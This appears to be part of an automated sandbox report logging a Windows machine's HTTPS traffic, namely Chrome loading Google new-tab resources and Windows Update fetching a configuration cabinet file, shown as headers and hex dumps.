                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1172INData Raw: 34 38 64 0d 0a 50 4c 30 74 46 5a 57 31 4b 4d 47 52 47 62 6a 4d 33 55 54 67 78 59 55 78 55 62 48 56 50 57 6c 56 6c 53 55 59 78 59 31 70 43 52 6c 4e 46 55 48 56 71 54 6c 4a 49 62 6d 64 30 65 45 64 4b 57 6b 5a 70 4e 6d 70 44 54 6b 4d 31 51 54 55 79 55 46 6c 45 65 6c 42 6d 59 58 42 4c 54 6d 35 5a 4f 54 5a 4f 62 31 56 74 62 57 4a 4c 56 6b 31 4c 5a 57 64 50 53 7a 63 78 63 6c 64 76 56 6d 64 32 52 6d 31 6a 53 31 59 31 57 46 70 55 62 6b 78 34 64 48 56 6a 5a 6e 68 36 61 57 78 77 51 7a 5a 59 63 6c 70 71 54 6a 64 69 56 30 34 33 4d 55 70 55 59 32 52 4c 55 6c 45 32 65 46 6c 33 51 53 74 51 54 6d 64 43 61 6c 42 6e 56 44 56 56 54 7a 68 61 65 46 42 45 59 6b 4d 31 56 55 74 45 59 6e 6c 6b 53 6d 31 51 5a 45 31 46 54 33 42 51 62 58 41 35 4d 7a 56 6d 64 6c 56 59 55 6d 56 4b 62
                                                                                                                                                                                                                                                      Data Ascii: 48dPL0tFZW1KMGRGbjM3UTgxYUxUbHVPWlVlSUYxY1pCRlNFUHVqTlJIbmd0eEdKWkZpNmpDTkM1QTUyUFlEelBmYXBLTm5ZOTZOb1VtbWJLVk1LZWdPSzcxcldvVmd2Rm1jS1Y1WFpUbkx4dHVjZnh6aWxwQzZYclpqTjdiV043MUpUY2RLUlE2eFl3QStQTmdCalBnVDVVTzhaeFBEYkM1VUtEYnlkSm1QZE1FT3BQbXA5MzVmdlVYUmVKb
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      39192.168.2.1049748142.250.181.1004435936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      40192.168.2.1049743142.250.181.1004435936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiFoM0BCNy9zQEIucrNAQi/0M0BCMbRzQEIutTNAQjK1s0BCKfYzQEI+cDUFRjymM0BGLnSzQEY642lFw==
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Version: 700238841
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:24 GMT
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC372INData Raw: 32 37 65 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                      Data Ascii: 27ea)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 32 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75
                                                                                                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700302,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69
                                                                                                                                                                                                                                                      Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1390INData Raw: 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28
                                                                                                                                                                                                                                                      Data Ascii: ow Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC124INData Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: uerySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC354INData Raw: 31 35 62 0d 0a 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6c 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6c 65 5b 64 5d 2c 63 29 3a 5f 2e 67 65 28 64 2c 5c 22
                                                                                                                                                                                                                                                      Data Ascii: 15bnull));return a||null};\n_.me\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:le.hasOwnProperty(d)?a.setAttribute(le[d],c):_.ge(d,\"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      41192.168.2.1049750142.250.181.1004435936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC1034INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Version: 700238841
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                      Accept-CH: Save-Data
                                                                                                                                                                                                                                                      Accept-CH: Downlink
                                                                                                                                                                                                                                                      Accept-CH: ECT
                                                                                                                                                                                                                                                      Accept-CH: RTT
                                                                                                                                                                                                                                                      Accept-CH: Device-Memory
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:24 GMT
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      42192.168.2.104973820.12.23.50443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YDsEo1WlfzddsTn&MD=WvWXA6YO HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                      MS-CorrelationId: 20dc864b-e32d-41a4-971d-c1c89f34c9a1
                                                                                                                                                                                                                                                      MS-RequestId: 0dcd38e2-b14e-455e-acf8-11cb020391e3
                                                                                                                                                                                                                                                      MS-CV: 3mdjPlVU1k2PVrT8.0
                                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
